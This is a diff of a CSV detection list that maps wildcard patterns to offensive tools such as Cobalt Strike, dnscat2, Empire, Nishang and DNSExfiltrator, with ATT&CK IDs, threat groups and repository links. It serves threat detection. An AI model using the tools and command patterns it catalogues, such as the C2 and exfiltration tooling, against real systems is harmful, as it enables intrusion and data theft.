+"*dnsadmin_serverlevelplugindll.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*DNSAES256Handler.*","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z" "*dns-beacon *","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*DNS-C2 #>*","offensive_tool_keyword","DNS-Persist","DNS-Persist is a post-exploitation agent which uses DNS for command and control.","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/DNS-Persist","1","0","N/A","10","10","211","75","2017-11-20T08:53:25Z","2017-11-10T15:23:49Z" -"*dnscan-master*","offensive_tool_keyword","dnscan","dnscan is a python wordlist-based DNS subdomain scanner.","T1595 - T1595.002 - T1018 - T1046","TA0007 - TA0043","N/A","N/A","Reconnaissance","https://github.com/rbsec/dnscan","1","1","N/A","6","10","984","413","2022-08-09T11:11:31Z","2013-03-13T10:42:07Z" +"*dnscan-master*","offensive_tool_keyword","dnscan","dnscan is a python wordlist-based DNS subdomain scanner.","T1595 - T1595.002 - T1018 - T1046","TA0007 - TA0043","N/A","N/A","Reconnaissance","https://github.com/rbsec/dnscan","1","1","N/A","6","10","985","413","2022-08-09T11:11:31Z","2013-03-13T10:42:07Z" "*dnscat -*","offensive_tool_keyword","dnscat2","This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol","T1071.004 - T1102 - T1071.001","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/iagox86/dnscat2","1","0","N/A","10","10","3077","596","2023-04-26T17:40:22Z","2013-01-04T23:15:55Z" "*dnscat tcpcat*","offensive_tool_keyword","dnscat2","This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol","T1071.004 - T1102 - T1071.001","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/iagox86/dnscat2","1","0","N/A","10","10","3077","596","2023-04-26T17:40:22Z","2013-01-04T23:15:55Z" "*dnscat*","offensive_tool_keyword","dnscat","Welcome to dnscat2. a DNS tunnel that WON'T make you sick and kill you This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol. 
which is an effective tunnel out of almost every network.","T1071 - T1090 - T1571","TA0011","N/A","N/A","Data Exfiltration","https://github.com/iagox86/dnscat2","1","0","N/A","N/A","10","3077","596","2023-04-26T17:40:22Z","2013-01-04T23:15:55Z" 
@@ -9445,7 +9593,7 @@
 "*dnscat2-win32.exe*","offensive_tool_keyword","dnscat2","This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol","T1071.004 - T1102 - T1071.001","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/iagox86/dnscat2","1","1","N/A","10","10","3077","596","2023-04-26T17:40:22Z","2013-01-04T23:15:55Z"
 "*dnschef --fakeip 127.0.0.1 -q*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
 "*dnsenum*","offensive_tool_keyword","dnsenum","multithreaded perl script to enumerate DNS information of a domain and to discover non-contiguous ip blocks.","T1218 - T1018 - T1190 - T1590 - T1012","TA0002 - TA0007","N/A","N/A","Information Gathering","https://github.com/fwaeytens/dnsenum","1","1","N/A","N/A","6","521","133","2019-10-08T19:58:40Z","2014-01-10T14:47:09Z"
-"*DNS-Enum-*-*.log*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z"
+"*DNS-Enum-*-*.log*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z"
 "*dnsexfiltrator.*","offensive_tool_keyword","DNSExfiltrator","DNSExfiltrator allows for transfering (exfiltrate) a file over a DNS request covert channel. This is basically a data leak testing tool allowing to exfiltrate data over a covert channel.","T1041 - T1048","TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/Arno0x/DNSExfiltrator","1","1","N/A","10","8","792","189","2019-10-06T22:24:55Z","2017-12-20T13:58:09Z"
 "*DNSExfiltratorLib*","offensive_tool_keyword","DNSExfiltrator","DNSExfiltrator allows for transfering (exfiltrate) a file over a DNS request covert channel. This is basically a data leak testing tool allowing to exfiltrate data over a covert channel.","T1041 - T1048","TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/Arno0x/DNSExfiltrator","1","1","N/A","10","8","792","189","2019-10-06T22:24:55Z","2017-12-20T13:58:09Z"
 "*DNSListener.py*","offensive_tool_keyword","DNS-Persist","DNS-Persist is a post-exploitation agent which uses DNS for command and control.","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/DNS-Persist","1","1","N/A","10","10","211","75","2017-11-20T08:53:25Z","2017-11-10T15:23:49Z"
@@ -9467,25 +9615,25 @@
 "*do_attack(*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","0","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z"
 "*do_bypassuac*","offensive_tool_keyword","DNS-Persist","DNS-Persist is a post-exploitation agent which uses DNS for command and control.","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/DNS-Persist","1","0","N/A","10","10","211","75","2017-11-20T08:53:25Z","2017-11-10T15:23:49Z"
 "*do_pyinject*","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","451","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z"
-"*Do-AltShiftEsc*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-MS16135.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
-"*Do-AltShiftTab*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-MS16135.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
-"*doc/extras/HACKING.*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
-"*docker * covenant*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","0","N/A","10","10","3787","732","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z"
-"*docker * --name elite *","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","0","N/A","10","10","3787","732","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z"
-"*docker * -t elite *","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","0","N/A","10","10","3787","732","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z"
-"*docker build -t rmg .*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","708","118","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z"
-"*docker run */pacu:latest*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3687","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z"
-"*docker run */usr/src/rde1*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","30","2","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z"
-"*docker run */usr/src/rec2*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","30","2","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z"
+"*Do-AltShiftEsc*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-MS16135.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*Do-AltShiftTab*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-MS16135.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*doc/extras/HACKING.*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*docker * covenant*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","0","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z"
+"*docker * --name elite *","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","0","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z"
+"*docker * -t elite *","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","0","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z"
+"*docker build -t rmg .*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z"
+"*docker run */pacu:latest*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z"
+"*docker run */usr/src/rde1*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z"
+"*docker run */usr/src/rec2*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z"
 "*docker run -p * spring4shell","offensive_tool_keyword","Spring4Shell","Dockerized Spring4Shell (CVE-2022-22965) PoC application and exploit","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tools","https://github.com/reznok/Spring4Shell-POC","1","0","N/A","N/A","4","303","229","2022-08-04T18:26:18Z","2022-03-31T00:24:28Z"
 "*docker run sitadel*","offensive_tool_keyword","Sitadel","Web Application Security Scanner","T1592.002 - T1210.001 - T1190.001 - T1046 - T1213 - T1071.001","TA0001 - TA0007 - TA0043 - TA0002 - TA0003","N/A","N/A","Network Exploitation tools","https://github.com/shenril/Sitadel","1","0","N/A","N/A","6","516","111","2020-01-21T14:59:40Z","2018-01-17T09:06:24Z"
-"*docker* donut *","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","2877","557","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z"
+"*docker* donut *","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z"
 "*docker-compose logs wiresocks*","offensive_tool_keyword","wiresocks","Docker-compose and Dockerfile to setup a wireguard VPN connection forcing specific TCP traffic through a socks proxy.","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","Defense Evasion","https://github.com/sensepost/wiresocks","1","0","N/A","9","3","250","24","2022-09-29T07:41:16Z","2022-03-23T12:27:07Z"
 "*DockerPwn*","offensive_tool_keyword","DockerPwn","Automation for abusing an exposed Docker TCP Socket. ","T1068 - T1528 - T1550","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/AbsoZed/DockerPwn.py","1","0","N/A","N/A","3","208","30","2022-12-08T03:17:35Z","2019-11-23T22:32:49Z"
-"*DocPlz-main.zip*","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","1","N/A","10","1","48","6","2023-10-03T23:06:53Z","2023-10-02T20:49:22Z"
-"*DocsPLZ\DocsPLZ.*","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","0","N/A","10","1","48","6","2023-10-03T23:06:53Z","2023-10-02T20:49:22Z"
-"*DoEvil()*","offensive_tool_keyword","ETWEventSubscription","Similar to WMI event subscriptions but leverages Event Tracing for Windows. When the event on the system occurs currently either when any user logs in or a specified process is started - the DoEvil() method is executed.","T1053.005 - T1546.003 - T1055.001","TA0004 - TA0005","N/A","N/A","Exploitation tools","https://github.com/matterpreter/OffensiveCSharp/tree/master/ETWEventSubscription","1","0","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z"
-"*Do-Exfiltration.ps1*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7849","2360","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z"
+"*DocPlz-main.zip*","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","1","N/A","10","1","81","13","2023-10-03T23:06:53Z","2023-10-02T20:49:22Z"
+"*DocsPLZ\DocsPLZ.*","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","0","N/A","10","1","81","13","2023-10-03T23:06:53Z","2023-10-02T20:49:22Z"
+"*DoEvil()*","offensive_tool_keyword","ETWEventSubscription","Similar to WMI event subscriptions but leverages Event Tracing for Windows. When the event on the system occurs currently either when any user logs in or a specified process is started - the DoEvil() method is executed.","T1053.005 - T1546.003 - T1055.001","TA0004 - TA0005","N/A","N/A","Exploitation tools","https://github.com/matterpreter/OffensiveCSharp/tree/master/ETWEventSubscription","1","0","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z"
+"*Do-Exfiltration.ps1*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z"
 "*Doge-Loader*xor.go*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Shellcode Loader by Golang","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/timwhitez/Doge-Loader","1","1","N/A","10","10","277","61","2021-04-22T08:24:59Z","2020-10-09T04:47:54Z"
